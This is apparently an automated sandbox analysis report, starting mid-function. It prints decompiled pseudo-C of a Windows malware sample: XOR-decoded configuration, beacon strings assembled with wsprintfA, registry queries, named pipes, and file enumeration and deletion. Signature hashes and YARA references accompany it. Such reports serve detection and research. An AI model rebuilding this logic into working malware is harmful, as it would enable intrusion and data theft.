							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x49dd2b4; // 0x69b25f44
								_t51 = E049D4F59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E049D2C74(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E049D4D70();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x49dd2b4; // 0x69b25f44
								_t52 = E049D4F59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E049D2C74(0, _t52) != 0) {
								_t121 =  *0x49dd35c; // 0x58195b0
								E049D3A19(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x49dd2b4; // 0x69b25f44
								_t53 = E049D4F59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x49dd2b8; // 0xe3a5a8
								_t22 = _t54 + 0x49de252; // 0x616d692f
								 *0x49dd304 = _t22;
								goto L60;
							} else {
								_t64 = E049D2C74(0, _t53);
								 *0x49dd304 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x49dd2b4; // 0x69b25f44
										_t56 = E049D4F59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x49dd2b8; // 0xe3a5a8
										_t23 = _t57 + 0x49de79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E049D2C74(0, _t56);
									}
									 *0x49dd370 = _t58;
									HeapFree( *0x49dd270, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                              0x049d294d
                              0x049d294d
                              0x049d294d
                              0x049d294d
                              0x049d2950
                              0x049d296d
                              0x049d297b
                              0x049d297b
                              0x049d2980
                              0x049d299a
                              0x049d2c08
                              0x049d2c0f
                              0x049d2c13
                              0x049d2c13
                              0x049d29a0
                              0x049d29a5
                              0x049d29bd
                              0x049d2bf5
                              0x049d2bff
                              0x00000000
                              0x049d29c3
                              0x049d29c3
                              0x049d29c4
                              0x049d29c9
                              0x049d29df
                              0x049d29cb
                              0x049d29cb
                              0x049d29d8
                              0x049d29d8
                              0x049d29e3
                              0x049d29ea
                              0x049d29ec
                              0x049d29f6
                              0x049d29fb
                              0x049d29fb
                              0x049d29f6
                              0x049d2a02
                              0x049d2a18
                              0x049d2a04
                              0x049d2a04
                              0x049d2a11
                              0x049d2a11
                              0x049d2a1c
                              0x049d2a1e
                              0x049d2a28
                              0x049d2a2d
                              0x049d2a2d
                              0x049d2a28
                              0x049d2a34
                              0x049d2a4a
                              0x049d2a36
                              0x049d2a36
                              0x049d2a43
                              0x049d2a43
                              0x049d2a4e
                              0x049d2a50
                              0x049d2a5a
                              0x049d2a5f
                              0x049d2a5f
                              0x049d2a5a
                              0x049d2a66
                              0x049d2a7c
                              0x049d2a68
                              0x049d2a68
                              0x049d2a75
                              0x049d2a75
                              0x049d2a80
                              0x049d2a82
                              0x049d2a8c
                              0x049d2a91
                              0x049d2a91
                              0x049d2a8c
                              0x049d2a98
                              0x049d2aae
                              0x049d2a9a
                              0x049d2a9a
                              0x049d2aa7
                              0x049d2aa7
                              0x049d2ab2
                              0x049d2ab4
                              0x049d2abe
                              0x049d2ac3
                              0x049d2ac3
                              0x049d2abe
                              0x049d2aca
                              0x049d2ae0
                              0x049d2acc
                              0x049d2acc
                              0x049d2ad9
                              0x049d2ad9
                              0x049d2ae4
                              0x049d2af7
                              0x049d2af7
                              0x00000000
                              0x049d2ae6
                              0x049d2ae6
                              0x049d2af0
                              0x00000000
                              0x049d2b01
                              0x049d2b01
                              0x049d2b03
                              0x049d2b19
                              0x049d2b05
                              0x049d2b05
                              0x049d2b12
                              0x049d2b12
                              0x049d2b1d
                              0x049d2b1f
                              0x049d2b22
                              0x049d2b23
                              0x049d2b2a
                              0x049d2b2c
                              0x049d2b2d
                              0x049d2b2d
                              0x049d2b2a
                              0x049d2b34
                              0x049d2b4a
                              0x049d2b36
                              0x049d2b36
                              0x049d2b43
                              0x049d2b43
                              0x049d2b4e
                              0x049d2b5c
                              0x049d2b66
                              0x049d2b66
                              0x049d2b6e
                              0x049d2b84
                              0x049d2b70
                              0x049d2b70
                              0x049d2b7d
                              0x049d2b7d
                              0x049d2b88
                              0x049d2b9b
                              0x049d2b9b
                              0x049d2ba0
                              0x049d2ba6
                              0x00000000
                              0x049d2b8a
                              0x049d2b8d
                              0x049d2b94
                              0x049d2b99
                              0x049d2bab
                              0x049d2bad
                              0x049d2bc3
                              0x049d2baf
                              0x049d2baf
                              0x049d2bbc
                              0x049d2bbc
                              0x049d2bc7
                              0x049d2bd3
                              0x049d2bd8
                              0x049d2bd8
                              0x049d2bc9
                              0x049d2bcc
                              0x049d2bcc
                              0x049d2be6
                              0x049d2beb
                              0x049d2bf1
                              0x00000000
                              0x049d2bf4
                              0x00000000
                              0x049d2b99
                              0x049d2b88
                              0x049d2af0
                              0x049d2ae4

                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D29F2
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2A24
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2A56
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2A88
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2ABA
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,049DD00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049D2AEC
                              • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049D2BEB
                              • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049D2BFF
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 35385f29c9e8380800973f0be430bc0e5786724f0cffcc3c29bba38494e464c0
                              • Instruction ID: 47f00388e5b07b149b55b3d37ee568b810121b24310f722ac3d4aeb5d708a76a
                              • Opcode Fuzzy Hash: 35385f29c9e8380800973f0be430bc0e5786724f0cffcc3c29bba38494e464c0
                              • Instruction Fuzzy Hash: 5C819074B05205AEDB20DFB8DE84D6B7BBDEB883047248AB5E105D7144E6B8FD859B20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D7132, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 74%
                              			E049D7132(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x49dd018; // 0x9945a377
				asm("bswap eax");
				_t61 =  *0x49dd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x49dd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x49dd00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0x49dd2b8; // 0xe3a5a8
				_t3 = _t64 + 0x49de633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f87e, _t63, _t62, _t61, _t60,  *0x49dd02c,  *0x49dd004, _t59);
				_t67 = E049D8DA6();
				_t68 =  *0x49dd2b8; // 0xe3a5a8
				_t4 = _t68 + 0x49de673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E049D40AC(_t134);
				_t133 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x49dd2b8; // 0xe3a5a8
					_t7 = _t126 + 0x49de8b2; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x49dd270, 0, _v8);
				}
				_t73 = E049D8941();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x49dd2b8; // 0xe3a5a8
					_t11 = _t121 + 0x49de885; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x49dd270, 0, _v8);
				}
				_t146 =  *0x49dd35c; // 0x58195b0
				_t75 = E049D3FB8(0x49dd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x49dd270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x49dd270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x49dd270, _t152, _v20);
						goto L26;
					}
					E049D47EF(GetTickCount());
					_t82 =  *0x49dd35c; // 0x58195b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x49dd35c; // 0x58195b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x49dd35c; // 0x58195b0
					_t148 = E049DA7FB(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x49dd270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x49dc2ac);
					_push(_t148);
					_t94 = E049D6F6D();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x49dd270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E049D65F6( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E049D55F1();
						L22:
						HeapFree( *0x49dd270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E049D7681(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E049D42E6(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E049D6DFA(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E049D2F36(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E049D6DFA(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                              0x049d7132
                              0x049d7132
                              0x049d7132
                              0x049d713d
                              0x049d7144
                              0x049d7146
                              0x049d7146
                              0x049d7153
                              0x049d715e
                              0x049d7161
                              0x049d7166
                              0x049d716f
                              0x049d7172
                              0x049d7177
                              0x049d717a
                              0x049d717f
                              0x049d7182
                              0x049d718e
                              0x049d719b
                              0x049d719d
                              0x049d71a3
                              0x049d71a8
                              0x049d71b3
                              0x049d71b5
                              0x049d71b8
                              0x049d71ba
                              0x049d71c1
                              0x049d71c7
                              0x049d71ca
                              0x049d71cd
                              0x049d71d2
                              0x049d71df
                              0x049d71e1
                              0x049d71e7
                              0x049d71f1
                              0x049d71f1
                              0x049d71f3
                              0x049d71fa
                              0x049d71fd
                              0x049d7200
                              0x049d7205
                              0x049d7212
                              0x049d7214
                              0x049d7222
                              0x049d7222
                              0x049d7224
                              0x049d7232
                              0x049d7237
                              0x049d723b
                              0x049d723e
                              0x049d73ff
                              0x049d7409
                              0x049d7412
                              0x049d7244
                              0x049d7250
                              0x049d7258
                              0x049d725b
                              0x049d73f3
                              0x049d73fd
                              0x00000000
                              0x049d73fd
                              0x049d7267
                              0x049d726c
                              0x049d7275
                              0x049d7286
                              0x049d728a
                              0x049d7293
                              0x049d7299
                              0x049d72a8
                              0x049d72af
                              0x049d72b8
                              0x049d72be
                              0x049d73e7
                              0x049d73f1
                              0x00000000
                              0x049d73f1
                              0x049d72ca
                              0x049d72d0
                              0x049d72d1
                              0x049d72d8
                              0x049d72db
                              0x049d73dd
                              0x049d73e5
                              0x00000000
                              0x049d73e5
                              0x049d72e4
                              0x049d72eb
                              0x049d72f3
                              0x049d72f8
                              0x049d7301
                              0x049d730c
                              0x049d7313
                              0x049d7316
                              0x049d7415
                              0x049d73c9
                              0x049d73c9
                              0x049d73ce
                              0x049d73d9
                              0x049d73db
                              0x00000000
                              0x049d73db
                              0x049d7320
                              0x049d7327
                              0x049d732a
                              0x049d732f
                              0x049d733f
                              0x049d7342
                              0x049d7348
                              0x049d734e
                              0x049d7354
                              0x049d7357
                              0x049d735d
                              0x049d7360
                              0x049d7365
                              0x049d7369
                              0x049d7369
                              0x049d7375
                              0x049d7381
                              0x049d7385
                              0x049d7387
                              0x049d738c
                              0x049d738e
                              0x049d7393
                              0x049d7398
                              0x049d73a5
                              0x049d73ad
                              0x049d73b0
                              0x049d73b0
                              0x049d738c
                              0x00000000
                              0x049d7377
                              0x049d737b
                              0x049d73b2
                              0x049d73b5
                              0x049d73be
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d73be
                              0x049d737d
                              0x00000000
                              0x049d737d
                              0x049d7375

                              APIs
                              • GetTickCount.KERNEL32 ref: 049D7146
                              • wsprintfA.USER32 ref: 049D7196
                              • wsprintfA.USER32 ref: 049D71B3
                              • wsprintfA.USER32 ref: 049D71DF
                              • HeapFree.KERNEL32(00000000,?), ref: 049D71F1
                              • wsprintfA.USER32 ref: 049D7212
                              • HeapFree.KERNEL32(00000000,?), ref: 049D7222
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049D7250
                              • GetTickCount.KERNEL32 ref: 049D7261
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D7275
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D7293
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,049D64DC,?,058195B0), ref: 049DA826
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(?,?,74785520,049D64DC,?,058195B0), ref: 049DA82E
                                • Part of subcall function 049DA7FB: strcpy.NTDLL ref: 049DA845
                                • Part of subcall function 049DA7FB: lstrcat.KERNEL32(00000000,?), ref: 049DA850
                                • Part of subcall function 049DA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049DA86D
                              • StrTrimA.SHLWAPI(00000000,049DC2AC,?,058195B0), ref: 049D72CA
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(05819B58,00000000,00000000,?,049D6507,00000000), ref: 049D6F7D
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(?), ref: 049D6F85
                                • Part of subcall function 049D6F6D: lstrcpy.KERNEL32(00000000,05819B58), ref: 049D6F99
                                • Part of subcall function 049D6F6D: lstrcat.KERNEL32(00000000,?), ref: 049D6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 049D72EB
                              • lstrcpy.KERNEL32(?,?), ref: 049D72F3
                              • lstrcat.KERNEL32(?,?), ref: 049D7301
                              • lstrcat.KERNEL32(?,00000000), ref: 049D7307
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                              • wcstombs.NTDLL ref: 049D7398
                                • Part of subcall function 049D42E6: SysAllocString.OLEAUT32(?), ref: 049D4327
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              • HeapFree.KERNEL32(00000000,?,?), ref: 049D73D9
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049D73E5
                              • HeapFree.KERNEL32(00000000,?,?,058195B0), ref: 049D73F1
                              • HeapFree.KERNEL32(00000000,?), ref: 049D73FD
                              • HeapFree.KERNEL32(00000000,?), ref: 049D7409
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                              • String ID: Uxt
                              • API String ID: 3748877296-1536154274
                              • Opcode ID: f9836dab4d7b3adec2170cf8b4b899b7f31131471095c8244fd60ff41aa7a564
                              • Instruction ID: 694ed5c5bd6bb400ba1c8bc2ae23d161e1b3c2f3e91e0d7a920e9369a40d6287
                              • Opcode Fuzzy Hash: f9836dab4d7b3adec2170cf8b4b899b7f31131471095c8244fd60ff41aa7a564
                              • Instruction Fuzzy Hash: 2D912871901208AFDB11DFA8EC84AAABFB9EF48314F148175F908D7250D738ED95DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D9D35, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32 ref: 053D9D51
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053D9D6D
                              • GetLastError.KERNEL32 ref: 053D9DBC
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D9DD2
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053D9DE6
                              • GetLastError.KERNEL32 ref: 053D9E00
                              • GetLastError.KERNEL32 ref: 053D9E33
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D9E51
                              • lstrlenW.KERNEL32(00000000,?), ref: 053D9E7D
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053D9E92
                              • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 053D9F66
                              • HeapFree.KERNEL32(00000000,?), ref: 053D9F75
                              • WaitForSingleObject.KERNEL32(00000000), ref: 053D9F8A
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053D9F9D
                              • HeapFree.KERNEL32(00000000,?), ref: 053D9FAF
                              • RtlExitUserThread.NTDLL(?,?), ref: 053D9FC4
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                              • String ID:
                              • API String ID: 3853681310-3916222277
                              • Opcode ID: d9483308440138e0729c01a51506e4d9c896bd830e7f29785d5acdfb92e00cdb
                              • Instruction ID: cbd98c471d02029c217475b0921d5921f9326385d77d8cf3f650412e18211853
                              • Opcode Fuzzy Hash: d9483308440138e0729c01a51506e4d9c896bd830e7f29785d5acdfb92e00cdb
                              • Instruction Fuzzy Hash: C2814B72910209EFDB219FA4EC89EAEBFBDFB48304F000469F505AB290DB719D05CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D673A, Relevance: 28.8, APIs: 19, Instructions: 290memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 053D6781
                              • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 053D67A5
                              • HeapFree.KERNEL32(00000000,?,00000029,00000000,00000000,?), ref: 053D67D0
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 053D67FC
                              • HeapFree.KERNEL32(00000000,053EA3F8,0000002A,00000000,00000000,00000000), ref: 053D6869
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053D68E1
                              • wsprintfA.USER32 ref: 053D68FD
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 053D691F
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053D6A25
                              • wsprintfA.USER32 ref: 053D6A3C
                              • lstrlen.KERNEL32(00000000,00000000), ref: 053D6A47
                              • lstrlen.KERNEL32(00000000,00000000), ref: 053D6908
                                • Part of subcall function 053CFD22: lstrlen.KERNEL32(?,?,00000000,00000000,053DD9EF,00000011,?,00000001,00000000,?,-00000008), ref: 053CFD52
                                • Part of subcall function 053CFD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 053CFD68
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,?,00000000), ref: 053CFD9E
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,00000000,?), ref: 053CFDB9
                                • Part of subcall function 053CFD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 053CFDD7
                                • Part of subcall function 053CFD22: GetLastError.KERNEL32 ref: 053CFDE1
                                • Part of subcall function 053CFD22: HeapFree.KERNEL32(00000000,00000000), ref: 053CFE04
                              • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 053D69AB
                              • wsprintfA.USER32 ref: 053D69C6
                              • lstrlen.KERNEL32(00000000,00000000), ref: 053D69D1
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 053D69E8
                              • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001), ref: 053D6A0A
                              • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 053D6A5E
                              • HeapFree.KERNEL32(00000000,?), ref: 053D6A8A
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                              • String ID:
                              • API String ID: 3130754786-0
                              • Opcode ID: 0dbbbe8840a3020dae2cdf26062c552561dfdeec13775323a9b50bd969c839c2
                              • Instruction ID: 0c315167840df2fadbb3e02d82c24e4b96ea41c17c3a46698044a072797d1e89
                              • Opcode Fuzzy Hash: 0dbbbe8840a3020dae2cdf26062c552561dfdeec13775323a9b50bd969c839c2
                              • Instruction Fuzzy Hash: 57B12BB6910209EFDB21DF94EC8ADAEBFBDFB08304F104469F516AA250DB715E41CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CF601, Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 053CF616
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 053DF68B
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?,?,00000000), ref: 053DF697
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF6DF
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF6FA
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF732
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(?), ref: 053DF73A
                                • Part of subcall function 053DF63F: memset.NTDLL ref: 053DF75D
                                • Part of subcall function 053DF63F: wcscpy.NTDLL ref: 053DF76F
                                • Part of subcall function 053DF63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 053DF795
                                • Part of subcall function 053DF63F: RtlEnterCriticalSection.NTDLL(?), ref: 053DF7CA
                                • Part of subcall function 053DF63F: RtlLeaveCriticalSection.NTDLL(?), ref: 053DF7E6
                                • Part of subcall function 053DF63F: FindNextFileW.KERNEL32(?,00000000), ref: 053DF7FF
                                • Part of subcall function 053DF63F: WaitForSingleObject.KERNEL32(00000000), ref: 053DF811
                                • Part of subcall function 053DF63F: FindClose.KERNEL32(?), ref: 053DF826
                                • Part of subcall function 053DF63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 053DF83A
                                • Part of subcall function 053DF63F: lstrlenW.KERNEL32(0000002C), ref: 053DF85C
                              • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 053CF672
                              • memcpy.NTDLL(00000000,?,00000000), ref: 053CF685
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053CF69C
                                • Part of subcall function 053DF63F: FindNextFileW.KERNEL32(?,00000000), ref: 053DF8D2
                                • Part of subcall function 053DF63F: WaitForSingleObject.KERNEL32(00000000), ref: 053DF8E4
                                • Part of subcall function 053DF63F: FindClose.KERNEL32(?), ref: 053DF8FF
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 053CF6C7
                              • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 053CF6DF
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053CF739
                              • lstrlenW.KERNEL32(00000000,?), ref: 053CF75C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053CF76E
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 053CF7E2
                              • HeapFree.KERNEL32(00000000,?), ref: 053CF7F2
                                • Part of subcall function 053D34A4: lstrlen.KERNEL32(053CEFEF,747DF560,00000000,?,00000000,053DBF21,?,00000000,?,?,053CEFEF,00000020), ref: 053D34B3
                                • Part of subcall function 053D34A4: mbstowcs.NTDLL ref: 053D34CF
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 053CF81B
                              • lstrlenW.KERNEL32(053F17D4,?), ref: 053CF895
                              • DeleteFileW.KERNEL32(?,?), ref: 053CF8C3
                              • HeapFree.KERNEL32(00000000,?), ref: 053CF8D1
                              • HeapFree.KERNEL32(00000000,?), ref: 053CF8F2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                              • String ID:
                              • API String ID: 72361108-0
